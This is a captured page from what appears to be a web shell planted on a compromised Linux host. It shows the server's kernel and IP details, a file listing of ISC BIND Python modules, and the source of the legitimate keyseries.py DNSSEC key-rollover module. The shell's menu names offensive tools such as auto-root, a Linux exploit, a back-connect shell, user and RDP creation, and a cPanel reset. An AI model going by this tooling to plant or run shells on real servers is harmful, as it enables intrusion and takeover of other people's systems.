Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.138.181.90
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
site-packages /
isc /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.py
936
B
-rw-r--r--
__init__.pyc
617
B
-rw-r--r--
__init__.pyo
617
B
-rw-r--r--
checkds.py
6.49
KB
-rw-r--r--
checkds.pyc
5.29
KB
-rw-r--r--
checkds.pyo
5.29
KB
-rw-r--r--
coverage.py
9.61
KB
-rw-r--r--
coverage.pyc
7.37
KB
-rw-r--r--
coverage.pyo
7.37
KB
-rw-r--r--
dnskey.py
15.9
KB
-rw-r--r--
dnskey.pyc
16.59
KB
-rw-r--r--
dnskey.pyo
16.59
KB
-rw-r--r--
eventlist.py
5.71
KB
-rw-r--r--
eventlist.pyc
4.83
KB
-rw-r--r--
eventlist.pyo
4.83
KB
-rw-r--r--
keydict.py
2.67
KB
-rw-r--r--
keydict.pyc
3.21
KB
-rw-r--r--
keydict.pyo
3.21
KB
-rw-r--r--
keyevent.py
2.76
KB
-rw-r--r--
keyevent.pyc
2.32
KB
-rw-r--r--
keyevent.pyo
2.32
KB
-rw-r--r--
keymgr.py
6.35
KB
-rw-r--r--
keymgr.pyc
4.91
KB
-rw-r--r--
keymgr.pyo
4.91
KB
-rw-r--r--
keyseries.py
7.34
KB
-rw-r--r--
keyseries.pyc
5
KB
-rw-r--r--
keyseries.pyo
5
KB
-rw-r--r--
keyzone.py
1.86
KB
-rw-r--r--
keyzone.pyc
1.54
KB
-rw-r--r--
keyzone.pyo
1.54
KB
-rw-r--r--
parsetab.py
9.98
KB
-rw-r--r--
parsetab.pyc
10.36
KB
-rw-r--r--
parsetab.pyo
10.36
KB
-rw-r--r--
policy.py
25.8
KB
-rw-r--r--
policy.pyc
22.62
KB
-rw-r--r--
policy.pyo
22.62
KB
-rw-r--r--
rndc.py
6.54
KB
-rw-r--r--
rndc.pyc
6.34
KB
-rw-r--r--
rndc.pyo
6.34
KB
-rw-r--r--
utils.py
2.17
KB
-rw-r--r--
utils.pyc
1.59
KB
-rw-r--r--
utils.pyo
1.59
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : keyseries.py
############################################################################ # Copyright (C) Internet Systems Consortium, Inc. ("ISC") # # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. # # See the COPYRIGHT file distributed with this work for additional # information regarding copyright ownership. ############################################################################ from collections import defaultdict from .dnskey import * from .keydict import * from .keyevent import * from .policy import * import time class keyseries: _K = defaultdict(lambda: defaultdict(list)) _Z = defaultdict(lambda: defaultdict(list)) _zones = set() _kdict = None _context = None def __init__(self, kdict, now=time.time(), context=None): self._kdict = kdict self._context = context self._zones = set(kdict.missing()) for zone in kdict.zones(): self._zones.add(zone) for alg, keys in kdict[zone].items(): for k in keys.values(): if k.sep: if not (k.delete() and k.delete() < now): self._K[zone][alg].append(k) else: if not (k.delete() and k.delete() < now): self._Z[zone][alg].append(k) self._K[zone][alg].sort() self._Z[zone][alg].sort() def __iter__(self): for zone in self._zones: for collection in [self._K, self._Z]: if zone not in collection: continue for alg, keys in collection[zone].items(): for key in keys: yield key def dump(self): for k in self: print("%s" % repr(k)) def fixseries(self, keys, policy, now, **kwargs): force = kwargs.get('force', False) if not keys: return # handle the first key key = keys[0] if key.sep: rp = policy.ksk_rollperiod prepub = policy.ksk_prepublish or (30 * 86400) postpub = policy.ksk_postpublish or (30 * 86400) else: rp = policy.zsk_rollperiod prepub = policy.zsk_prepublish or (30 * 86400) postpub = policy.zsk_postpublish or (30 * 86400) # the first key should be published and active p = key.publish() a = key.activate() if not p or p > now: key.setpublish(now) if not a or a > now: key.setactivate(now) if not rp: key.setinactive(None, **kwargs) key.setdelete(None, **kwargs) else: key.setinactive(a + rp, **kwargs) key.setdelete(a + rp + postpub, **kwargs) if policy.keyttl != key.ttl: key.setttl(policy.keyttl) # handle all the subsequent keys prev = key for key in keys[1:]: # if no rollperiod, then all keys after the first in # the series kept inactive. # (XXX: we need to change this to allow standby keys) if not rp: key.setpublish(None, **kwargs) key.setactivate(None, **kwargs) key.setinactive(None, **kwargs) key.setdelete(None, **kwargs) if policy.keyttl != key.ttl: key.setttl(policy.keyttl) continue # otherwise, ensure all dates are set correctly based on # the initial key a = prev.inactive() p = a - prepub key.setactivate(a, **kwargs) key.setpublish(p, **kwargs) key.setinactive(a + rp, **kwargs) key.setdelete(a + rp + postpub, **kwargs) prev.setdelete(a + postpub, **kwargs) if policy.keyttl != key.ttl: key.setttl(policy.keyttl) prev = key # if we haven't got sufficient coverage, create successor key(s) while rp and prev.inactive() and \ prev.inactive() < now + policy.coverage: # commit changes to predecessor: a successor can only be # generated if Inactive has been set in the predecessor key prev.commit(self._context['settime_path'], **kwargs) key = prev.generate_successor(self._context['keygen_path'], self._context['randomdev'], prepub, **kwargs) key.setinactive(key.activate() + rp, **kwargs) key.setdelete(key.inactive() + postpub, **kwargs) keys.append(key) prev = key # last key? we already know we have sufficient coverage now, so # disable the inactivation of the final key (if it was set), # ensuring that if dnssec-keymgr isn't run again, the last key # in the series will at least remain usable. prev.setinactive(None, **kwargs) prev.setdelete(None, **kwargs) # commit changes for key in keys: key.commit(self._context['settime_path'], **kwargs) def enforce_policy(self, policies, now=time.time(), **kwargs): # If zones is provided as a parameter, use that list. # If not, use what we have in this object zones = kwargs.get('zones', self._zones) keys_dir = kwargs.get('dir', self._context.get('keys_path', None)) force = kwargs.get('force', False) for zone in zones: collections = [] policy = policies.policy(zone) keys_dir = keys_dir or policy.directory or '.' alg = policy.algorithm algnum = dnskey.algnum(alg) if 'ksk' not in kwargs or not kwargs['ksk']: if len(self._Z[zone][algnum]) == 0: k = dnskey.generate(self._context['keygen_path'], self._context['randomdev'], keys_dir, zone, alg, policy.zsk_keysize, False, policy.keyttl or 3600, **kwargs) self._Z[zone][algnum].append(k) collections.append(self._Z[zone]) if 'zsk' not in kwargs or not kwargs['zsk']: if len(self._K[zone][algnum]) == 0: k = dnskey.generate(self._context['keygen_path'], self._context['randomdev'], keys_dir, zone, alg, policy.ksk_keysize, True, policy.keyttl or 3600, **kwargs) self._K[zone][algnum].append(k) collections.append(self._K[zone]) for collection in collections: for algorithm, keys in collection.items(): if algorithm != algnum: continue try: self.fixseries(keys, policy, now, **kwargs) except Exception as e: raise Exception('%s/%s: %s' % (zone, dnskey.algstr(algnum), str(e)))
Close